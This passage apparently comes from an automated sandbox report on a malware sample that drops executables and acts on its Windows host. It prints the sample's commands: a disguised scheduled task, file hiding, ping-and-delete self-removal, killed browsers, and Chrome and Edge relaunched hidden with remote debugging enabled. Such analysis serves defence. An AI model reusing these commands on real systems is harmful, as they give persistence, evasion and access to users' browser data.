Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{99B98B5A-CBB6-4E46-9DC5-44236C420155}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\SYSTEM32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
6620	PING.EXE
4436	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3608	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
3568	skotes.exe
3568	skotes.exe
2628	NK4PJqi.exe
264	powershell.exe
264	powershell.exe
264	powershell.exe
2372	InstallUtil.exe
2372	InstallUtil.exe
2372	InstallUtil.exe
4404	vvcWObH.exe
3204	dxdiag.exe
3204	dxdiag.exe
5900	chrome.exe
5900	chrome.exe
1476	msedge.exe
1476	msedge.exe
3192	msedge.exe
3192	msedge.exe
4004	msedge.exe
4004	msedge.exe
6164	msedge.exe
6164	msedge.exe
5128	msedge.exe
5128	msedge.exe
6516	msedge.exe
6516	msedge.exe
5672	msedge.exe
5672	msedge.exe
5692	msedge.exe
5692	msedge.exe
4420	skotes.exe
4420	skotes.exe
1780	MicrosoftEdgeUpdateTaskMachineCoreSC.exe
100	explorer.exe
100	explorer.exe
3048	powershell.exe
3048	powershell.exe
3048	powershell.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe
100	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2628	NK4PJqi.exe
Token: SeDebugPrivilege	2628	NK4PJqi.exe
Token: SeDebugPrivilege	2372	InstallUtil.exe
Token: SeDebugPrivilege	264	powershell.exe
Token: SeDebugPrivilege	4404	vvcWObH.exe
Token: SeIncreaseQuotaPrivilege	5716	WMIC.exe
Token: SeSecurityPrivilege	5716	WMIC.exe
Token: SeTakeOwnershipPrivilege	5716	WMIC.exe
Token: SeLoadDriverPrivilege	5716	WMIC.exe
Token: SeSystemProfilePrivilege	5716	WMIC.exe
Token: SeSystemtimePrivilege	5716	WMIC.exe
Token: SeProfSingleProcessPrivilege	5716	WMIC.exe
Token: SeIncBasePriorityPrivilege	5716	WMIC.exe
Token: SeCreatePagefilePrivilege	5716	WMIC.exe
Token: SeBackupPrivilege	5716	WMIC.exe
Token: SeRestorePrivilege	5716	WMIC.exe
Token: SeShutdownPrivilege	5716	WMIC.exe
Token: SeDebugPrivilege	5716	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5716	WMIC.exe
Token: SeRemoteShutdownPrivilege	5716	WMIC.exe
Token: SeUndockPrivilege	5716	WMIC.exe
Token: SeManageVolumePrivilege	5716	WMIC.exe
Token: 33	5716	WMIC.exe
Token: 34	5716	WMIC.exe
Token: 35	5716	WMIC.exe
Token: 36	5716	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5716	WMIC.exe
Token: SeSecurityPrivilege	5716	WMIC.exe
Token: SeTakeOwnershipPrivilege	5716	WMIC.exe
Token: SeLoadDriverPrivilege	5716	WMIC.exe
Token: SeSystemProfilePrivilege	5716	WMIC.exe
Token: SeSystemtimePrivilege	5716	WMIC.exe
Token: SeProfSingleProcessPrivilege	5716	WMIC.exe
Token: SeIncBasePriorityPrivilege	5716	WMIC.exe
Token: SeCreatePagefilePrivilege	5716	WMIC.exe
Token: SeBackupPrivilege	5716	WMIC.exe
Token: SeRestorePrivilege	5716	WMIC.exe
Token: SeShutdownPrivilege	5716	WMIC.exe
Token: SeDebugPrivilege	5716	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5716	WMIC.exe
Token: SeRemoteShutdownPrivilege	5716	WMIC.exe
Token: SeUndockPrivilege	5716	WMIC.exe
Token: SeManageVolumePrivilege	5716	WMIC.exe
Token: 33	5716	WMIC.exe
Token: 34	5716	WMIC.exe
Token: 35	5716	WMIC.exe
Token: 36	5716	WMIC.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeShutdownPrivilege	5900	chrome.exe
Token: SeCreatePagefilePrivilege	5900	chrome.exe
Token: SeShutdownPrivilege	5900	chrome.exe
Token: SeCreatePagefilePrivilege	5900	chrome.exe
Token: SeShutdownPrivilege	5900	chrome.exe
Token: SeCreatePagefilePrivilege	5900	chrome.exe
Token: SeShutdownPrivilege	5900	chrome.exe
Token: SeCreatePagefilePrivilege	5900	chrome.exe
Token: SeShutdownPrivilege	5900	chrome.exe
Token: SeCreatePagefilePrivilege	5900	chrome.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1412	taskkill.exe
Token: SeDebugPrivilege	5756	taskkill.exe
Token: SeDebugPrivilege	6168	taskkill.exe
Token: SeDebugPrivilege	6928	taskkill.exe
Token: SeDebugPrivilege	7008	taskkill.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
5900	chrome.exe
5900	chrome.exe
5128	msedge.exe
100	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3204	dxdiag.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1168 wrote to memory of 3568	1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe	82
PID 1168 wrote to memory of 3568	1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe	82
PID 1168 wrote to memory of 3568	1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe	82
PID 3568 wrote to memory of 2628	3568	skotes.exe	84
PID 3568 wrote to memory of 2628	3568	skotes.exe	84
PID 3568 wrote to memory of 2628	3568	skotes.exe	84
PID 3568 wrote to memory of 5028	3568	skotes.exe	85
PID 3568 wrote to memory of 5028	3568	skotes.exe	85
PID 5028 wrote to memory of 2512	5028	DU1zDwm.exe	99
PID 5028 wrote to memory of 2512	5028	DU1zDwm.exe	99
PID 5028 wrote to memory of 1648	5028	DU1zDwm.exe	87
PID 5028 wrote to memory of 1648	5028	DU1zDwm.exe	87
PID 5028 wrote to memory of 3608	5028	DU1zDwm.exe	88
PID 5028 wrote to memory of 3608	5028	DU1zDwm.exe	88
PID 5028 wrote to memory of 264	5028	DU1zDwm.exe	90
PID 5028 wrote to memory of 264	5028	DU1zDwm.exe	90
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 2628 wrote to memory of 2372	2628	NK4PJqi.exe	93
PID 264 wrote to memory of 4436	264	powershell.exe	95
PID 264 wrote to memory of 4436	264	powershell.exe	95
PID 3568 wrote to memory of 4404	3568	skotes.exe	100
PID 3568 wrote to memory of 4404	3568	skotes.exe	100
PID 4404 wrote to memory of 5224	4404	vvcWObH.exe	101
PID 4404 wrote to memory of 5224	4404	vvcWObH.exe	101
PID 5224 wrote to memory of 5716	5224	cmd.exe	103
PID 5224 wrote to memory of 5716	5224	cmd.exe	103
PID 4404 wrote to memory of 3204	4404	vvcWObH.exe	106
PID 4404 wrote to memory of 3204	4404	vvcWObH.exe	106
PID 4404 wrote to memory of 2424	4404	vvcWObH.exe	117
PID 4404 wrote to memory of 2424	4404	vvcWObH.exe	117
PID 4404 wrote to memory of 5900	4404	vvcWObH.exe	119
PID 4404 wrote to memory of 5900	4404	vvcWObH.exe	119
PID 5900 wrote to memory of 4764	5900	chrome.exe	120
PID 5900 wrote to memory of 4764	5900	chrome.exe	120
PID 5900 wrote to memory of 5712	5900	chrome.exe	121
PID 5900 wrote to memory of 5712	5900	chrome.exe	121
PID 5900 wrote to memory of 6720	5900	chrome.exe	122
PID 5900 wrote to memory of 6720	5900	chrome.exe	122
PID 5900 wrote to memory of 5604	5900	chrome.exe	123
PID 5900 wrote to memory of 5604	5900	chrome.exe	123
PID 5900 wrote to memory of 6124	5900	chrome.exe	124
PID 5900 wrote to memory of 6124	5900	chrome.exe	124
PID 5900 wrote to memory of 1008	5900	chrome.exe	125
PID 5900 wrote to memory of 1008	5900	chrome.exe	125
PID 5900 wrote to memory of 2484	5900	chrome.exe	128
PID 5900 wrote to memory of 2484	5900	chrome.exe	128
PID 4404 wrote to memory of 1644	4404	vvcWObH.exe	130
PID 4404 wrote to memory of 1644	4404	vvcWObH.exe	130
PID 4404 wrote to memory of 5128	4404	vvcWObH.exe	132
PID 4404 wrote to memory of 5128	4404	vvcWObH.exe	132
PID 5128 wrote to memory of 5308	5128	msedge.exe	133
PID 5128 wrote to memory of 5308	5128	msedge.exe	133
PID 5128 wrote to memory of 1476	5128	msedge.exe	134
PID 5128 wrote to memory of 1476	5128	msedge.exe	134
PID 5128 wrote to memory of 3192	5128	msedge.exe	135
PID 5128 wrote to memory of 3192	5128	msedge.exe	135
PID 5128 wrote to memory of 4004	5128	msedge.exe	136
PID 5128 wrote to memory of 4004	5128	msedge.exe	136

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1648	attrib.exe
2512	attrib.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:792
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1112
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4420
- C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
  C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:1780
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3048
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.1.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:6620
- C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3284
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5316
- C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
  C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1828
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1388
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2652
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5768
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    PID:3580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3444

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3536
- C:\Users\Admin\AppData\Local\Temp\1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
  "C:\Users\Admin\AppData\Local\Temp\1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Users\Admin\AppData\Local\Temp\1011308001\NK4PJqi.exe
      "C:\Users\Admin\AppData\Local\Temp\1011308001\NK4PJqi.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2628
  - - C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe
      "C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5028
    - - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
        5⤵
        Views/modifies file attributes
        
        PID:2512
    - - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
        5⤵
        Views/modifies file attributes
        
        PID:1648
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del DU1zDwm.exe
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:264
      - C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe
      "C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4404
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c wmic path win32_videocontroller get caption
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5224
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_videocontroller get caption
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
    - - C:\Windows\SYSTEM32\dxdiag.exe
        
        "dxdiag" /t C:\Users\Admin\AppData\Local\Temp\dxdiag.txt
        5⤵
        Drops file in System32 directory
        Checks SCSI registry key(s)
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3204
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2424
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=12643 --profile-directory="Default" --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5900
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff852edcc40,0x7ff852edcc4c,0x7ff852edcc58
        6⤵
        
        PID:4764
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1924,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
        6⤵
        
        PID:5712
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1960,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1980 /prefetch:3
        6⤵
        
        PID:6720
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2044,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:8
        6⤵
        
        PID:5604
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=12643 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2880,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2900 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6124
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=12643 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2904,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3052 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1008
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=12643 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4072,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4028 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2484
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=16144 --profile-directory="Default" --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5128
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
